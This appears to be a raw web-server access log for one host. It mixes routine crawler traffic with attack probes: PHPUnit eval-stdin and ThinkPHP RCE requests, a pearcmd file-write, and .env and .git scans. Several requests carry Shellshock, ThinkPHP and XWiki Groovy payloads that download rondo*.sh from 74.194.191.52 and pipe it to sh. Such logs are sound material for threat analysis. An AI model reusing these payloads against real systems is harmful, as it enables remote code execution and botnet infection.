212.227.3.26 - - [07/Nov/2025:20:35:59 +0300] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:59 +0300] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:36:00 +0300] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:36:00 +0300] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:36:00 +0300] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:36:00 +0300] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:36:00 +0300] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:36:00 +0300] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:36:00 +0300] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:36:00 +0300] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:36:00 +0300] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 302 - "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:36:00 +0300] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:36:00 +0300] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1" 302 - "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:36:00 +0300] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 302 - "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:36:01 +0300] "GET /containers/json HTTP/1.1" 404 298 "-" "libredtail-http"
3.145.49.236 - - [07/Nov/2025:20:37:04 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:20:37:05 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:20:39:33 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:20:39:33 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:20:42:35 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:20:42:35 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [07/Nov/2025:20:49:20 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 299
44.201.177.43 - - [07/Nov/2025:20:49:34 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:20:49:34 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:20:53:14 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:20:53:14 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
172.178.83.199 - - [07/Nov/2025:21:03:21 +0300] "GET /actuator/health HTTP/1.1" 404 298 "-" "Mozilla/5.0 zgrab/0.x"
79.124.40.174 - - [07/Nov/2025:21:05:58 +0300] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 -
79.124.40.174 - - [07/Nov/2025:21:05:58 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
44.201.177.43 - - [07/Nov/2025:21:06:33 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:21:06:33 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
34.247.51.117 - - [07/Nov/2025:21:08:53 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
34.247.51.117 - - [07/Nov/2025:21:08:53 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.94.167.98 - - [07/Nov/2025:21:12:38 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.94.167.98 - - [07/Nov/2025:21:12:39 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
49.51.183.15 - - [07/Nov/2025:21:16:55 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.183.15 - - [07/Nov/2025:21:16:58 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91-132-49-059.cprapid.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
44.201.177.43 - - [07/Nov/2025:21:20:32 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:21:20:33 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:21:24:56 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:21:24:57 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:21:42:00 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:21:42:01 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:21:46:37 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:21:46:37 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
93.174.93.12 - - [07/Nov/2025:21:46:37 +0300] "GET / HTTP/1.0" 302 119 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9"
3.80.46.54 - - [07/Nov/2025:21:49:22 +0300] "GET / HTTP/1.1" 302 -
54.235.62.55 - - [07/Nov/2025:21:49:32 +0300] "GET /robots.txt HTTP/1.1" 404 299
3.146.107.169 - - [07/Nov/2025:21:51:44 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:21:51:44 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
54.90.225.149 - - [07/Nov/2025:21:51:51 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
13.222.252.87 - - [07/Nov/2025:21:51:59 +0300] "GET /favicon.ico HTTP/1.1" 200 30894
167.94.138.51 - - [07/Nov/2025:21:55:25 +0300] "GET / HTTP/1.1" 302 -
167.94.138.51 - - [07/Nov/2025:21:55:39 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
167.94.138.51 - - [07/Nov/2025:21:56:54 +0300] "GET / HTTP/1.1" 302 -
167.94.138.51 - - [07/Nov/2025:21:57:14 +0300] "GET /security.txt HTTP/1.1" 404 299
3.146.107.169 - - [07/Nov/2025:21:57:28 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:21:57:29 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
43.130.15.147 - - [07/Nov/2025:22:00:34 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.15.147 - - [07/Nov/2025:22:00:37 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91-132-49-59.cprapid.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
3.145.49.236 - - [07/Nov/2025:22:05:50 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:22:05:50 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:22:08:11 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:22:08:11 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
213.209.157.254 - - [07/Nov/2025:22:08:31 +0300] "GET /.git/index HTTP/1.1" 404 299
3.146.107.169 - - [07/Nov/2025:22:16:27 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:22:16:27 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
198.235.24.84 - - [07/Nov/2025:22:16:28 +0300] "GET / HTTP/1.0" 302 119 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
3.145.49.236 - - [07/Nov/2025:22:17:24 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:22:17:25 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
20.29.23.94 - - [07/Nov/2025:22:17:55 +0300] "GET /manager/text/list HTTP/1.1" 404 298 "-" "Mozilla/5.0 zgrab/0.x"
159.65.164.238 - - [07/Nov/2025:22:20:43 +0300] "GET /.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.164.238 - - [07/Nov/2025:22:20:47 +0300] "GET /.git/config HTTP/1.1" 404 299
204.76.203.219 - - [07/Nov/2025:22:24:14 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.145.49.236 - - [07/Nov/2025:22:33:26 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:22:33:26 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:22:35:52 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:22:35:52 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:22:45:48 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:22:45:48 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
185.242.226.107 - - [07/Nov/2025:22:48:20 +0300] "GET / HTTP/1.1" 302 -
185.242.226.107 - - [07/Nov/2025:22:48:20 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
3.145.49.236 - - [07/Nov/2025:22:52:10 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:22:52:10 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:22:54:23 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:22:54:23 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.212 - - [07/Nov/2025:22:56:54 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
::1 - - [07/Nov/2025:23:03:50 +0300] "GET /limesurvey/index.php/admin/authentication/sa/login HTTP/1.1" 200 19309
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.css HTTP/1.1" 200 32146
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/1dc39fff/ibm-serif.css HTTP/1.1" 200 2345
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/b6d5324e/css/select2.min.css HTTP/1.1" 200 16264
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/b22a13aa/ibm-sans.css HTTP/1.1" 200 2463
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/d03c6e50/remixicon.css HTTP/1.1" 200 120156
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/tempus-dominus.min.css HTTP/1.1" 200 48393
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/65545126/roboto.css HTTP/1.1" 200 9693
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/65545126/icomoon.css HTTP/1.1" 200 8905
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/c079016d/select2-bootstrap-5-theme.min.css HTTP/1.1" 200 31223
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/f41f3686/build/lstutorial.css HTTP/1.1" 200 618
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/css/adminsidepanel.css HTTP/1.1" 200 12617
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/719a6b3e/jquery.min.js HTTP/1.1" 200 87533
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/fe219f6b/css/font-awesome.min.css HTTP/1.1" 200 31000
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/59c9629e/jquery-migrate.min.js HTTP/1.1" 200 13467
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/c2b84cea/css/sea_green.css HTTP/1.1" 200 420829
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/5705645f/js.cookie.min.js HTTP/1.1" 200 1681
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/datepickerInit.js HTTP/1.1" 200 7120
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.js HTTP/1.1" 200 254963
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/f56677d0/build/lslog.js HTTP/1.1" 200 85620
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/js/adminsidepanel.js HTTP/1.1" 200 270771
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/popper-tempus.js HTTP/1.1" 200 264788
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/bc17442/min/pjax.combined.min.js HTTP/1.1" 200 24812
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/cca8c333/moment-with-locales.min.js HTTP/1.1" 200 369019
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/b6d5324e/js/select2.full.min.js HTTP/1.1" 200 76768
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/config.js HTTP/1.1" 200 10394
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/2ecc5c8c/ckeditoradditions.js HTTP/1.1" 200 4665
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/d0d3da13/js/bootstrap_5.min.js HTTP/1.1" 200 90838
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/78d99fe5/script.js HTTP/1.1" 200 141
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/5c01f867/js/modaleditor.js HTTP/1.1" 200 4842
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/f41f3686/build/lstutorial.min.js HTTP/1.1" 200 32791
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/70918d6/build/adminbasics.min.js HTTP/1.1" 200 344852
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/ckeditor.js HTTP/1.1" 200 821197
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/assets/images/logo-white.png HTTP/1.1" 200 6863
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/assets/images/decor-2.png HTTP/1.1" 200 301
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/assets/images/decor-1.png HTTP/1.1" 200 6530
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Regular.ttf HTTP/1.1" 200 175748
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-SemiBold.ttf HTTP/1.1" 200 177272
::1 - - [07/Nov/2025:23:03:51 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Medium.ttf HTTP/1.1" 200 177104
::1 - - [07/Nov/2025:23:03:52 +0300] "GET /limesurvey/tmp/assets/65545126/font-src/roboto-v18-latin_latin-ext/roboto-v18-latin_latin-ext-regular.woff2 HTTP/1.1" 200 21920
::1 - - [07/Nov/2025:23:03:52 +0300] "GET /limesurvey/tmp/assets/b22a13aa/IBMPlexSans-Bold.ttf HTTP/1.1" 200 175712
204.76.203.18 - - [07/Nov/2025:23:05:16 +0300] "GET / HTTP/1.1" 302 - "-" "-"
3.145.49.236 - - [07/Nov/2025:23:05:20 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:23:05:20 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
159.65.164.238 - - [07/Nov/2025:23:06:09 +0300] "GET /.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.164.238 - - [07/Nov/2025:23:06:12 +0300] "GET /.git/config HTTP/1.1" 404 299
44.201.177.43 - - [07/Nov/2025:23:06:53 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:23:06:54 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
87.121.84.80 - - [07/Nov/2025:23:12:50 +0300] "GET / HTTP/1.0" 302 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
185.242.226.107 - - [07/Nov/2025:23:18:28 +0300] "GET /dashboard/images/favicon.png HTTP/1.1" 200 2508
79.124.40.174 - - [07/Nov/2025:23:22:19 +0300] "GET /actuator/gateway/routes HTTP/1.1" 404 299
3.145.49.236 - - [07/Nov/2025:23:28:46 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:23:28:46 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
52.90.168.250 - - [07/Nov/2025:23:32:14 +0300] "\x16\x03\x01\x05\xc4\x01" 400 325 "-" "-"
52.90.168.250 - - [07/Nov/2025:23:32:14 +0300] "\x16\x03\x01" 400 325 "-" "-"
52.90.168.250 - - [07/Nov/2025:23:32:15 +0300] "\x16\x03\x01" 400 325 "-" "-"
3.145.49.236 - - [07/Nov/2025:23:37:10 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:23:37:10 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:23:38:12 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:23:38:12 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:23:46:59 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:23:46:59 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [08/Nov/2025:00:03:35 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
3.145.49.236 - - [08/Nov/2025:00:06:33 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:00:06:34 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
157.245.151.109 - - [08/Nov/2025:00:10:18 +0300] "GET /+CSCOL+/Java.jar HTTP/1.1" 404 299
157.245.151.109 - - [08/Nov/2025:00:10:20 +0300] "GET /+CSCOE+/logon_forms.js HTTP/1.1" 404 299
157.245.151.109 - - [08/Nov/2025:00:10:21 +0300] "GET /+CSCOL+/a1.jar HTTP/1.1" 404 299
157.245.151.109 - - [08/Nov/2025:00:10:22 +0300] "GET /+CSCOE+/transfer.js HTTP/1.1" 404 299
193.26.115.195 - - [08/Nov/2025:00:13:15 +0300] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [08/Nov/2025:00:13:15 +0300] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 302 - "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [08/Nov/2025:00:13:15 +0300] "GET /public/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [08/Nov/2025:00:13:15 +0300] "POST /index.php?s=captcha HTTP/1.1" 302 - "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [08/Nov/2025:00:13:15 +0300] "POST /cgi-bin/login.cgi HTTP/1.0" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [08/Nov/2025:00:13:16 +0300] "GET / HTTP/1.1" 302 - "-" "() { :; }; /bin/bash -c \"(wget -qO- http://74.194.191.52/rondo.qre.sh||busybox wget -qO- http://74.194.191.52/rondo.qre.sh||curl -s http://74.194.191.52/rondo.qre.sh)|sh\"& # bang2013@atomicmail.io"
193.26.115.195 - - [08/Nov/2025:00:13:16 +0300] "POST /cgi-bin/cgi_main.cgi HTTP/1.1" 404 298 "http://91.132.49.59/cfg_system_time.htm" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [08/Nov/2025:00:13:16 +0300] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 298 "http://91.132.49.59/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [08/Nov/2025:00:13:16 +0300] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 400 328 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [08/Nov/2025:00:13:16 +0300] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [08/Nov/2025:00:13:16 +0300] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
185.180.140.111 - - [08/Nov/2025:00:15:04 +0300] "GET /OA_HTML/AppsLocalLogin.jsp HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
3.146.107.169 - - [08/Nov/2025:00:17:11 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:00:17:12 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
78.153.140.203 - - [08/Nov/2025:00:17:28 +0300] "GET /.env HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:29 +0300] "GET /api/.env HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:30 +0300] "GET /backend/.env HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:31 +0300] "GET /admin/.env HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:32 +0300] "GET /.env.example HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:33 +0300] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:34 +0300] "GET /?phpinfo=-1 HTTP/1.1" 302 -
78.153.140.203 - - [08/Nov/2025:00:17:35 +0300] "GET /new/.env HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:36 +0300] "GET /frontend/web/debug/default/view HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:37 +0300] "GET /_static/.env HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:39 +0300] "GET /download/.env HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:40 +0300] "GET /saas/.env HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:41 +0300] "GET /.env.json HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:42 +0300] "GET /infos/ HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:44 +0300] "GET /apps/.env HTTP/1.1" 404 299
78.153.140.203 - - [08/Nov/2025:00:17:45 +0300] "GET /templates/.env HTTP/1.1" 404 299
